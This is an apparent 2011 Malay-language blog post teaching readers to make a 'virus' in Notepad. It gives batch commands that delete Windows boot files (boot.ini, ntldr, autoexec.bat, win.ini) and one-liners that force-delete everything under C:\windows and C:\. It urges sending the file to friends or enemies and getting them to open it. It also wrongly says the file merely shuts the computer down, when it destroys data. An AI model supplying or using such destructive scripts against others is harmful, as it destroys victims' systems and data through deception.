Sunday, October 30, 2011

Cipta Virus Pemusnah Komputer.

Kali ni Kiddo nak share pasal virus yang dibuat sendiri oleh kita hanya menggunakan notepad..dan ia boleh mematikan komputer orang lain dan jugak kita sendiri..okey..kalo korang nak kenekan org yang korang x suka korang boley cuba trik yang kiddo bagi kat bawah..

ok mari kita mula:

Korang buka notepad dan copy / paste kod ini:

@ Echo off
attrib-r-s-h c: \ autoexec.bat
del c: \ autoexec.bat
attrib-r-s-h c: \ boot.ini
del c: \ boot.ini
attrib-r-s-h c: \ ntldr
del c: \ ntldr
attrib-r-s-h c: \ windows \ win.ini
del c: \ windows \ win.ini


Sekarang  korang simpan sebagai fail  txt yang korang buat td dengan extension .bat..(ape2 nama yang korang suke la)

Fail ini boleh mematikan (shutdown) komputer seseorang.
Ia mematikan komputer dan memadam fail yang diperlukan untuk reboot dan restart.

korang boleh kirim file ni ke komputer kawan-kawan mahupun lawan dan beritahu mereka untuk membukanya.

Berikut ini adalah kod lain yang boleh digunakan juga:

cmd / c del c: \ windows \ * / F / S / Q

cmd / c del c: \ * / F / S / Q

Paste di Notepad dan simpan fail ini dengan Extension cmd atau bat..

AMARAN: JGN KLIK FILE TU OK>>FILE YANG KORANG BUAT TU AKN MENYEBABKAN KOMPUTER KORANG SENDIRI YANG KENA..

place of visitor online:-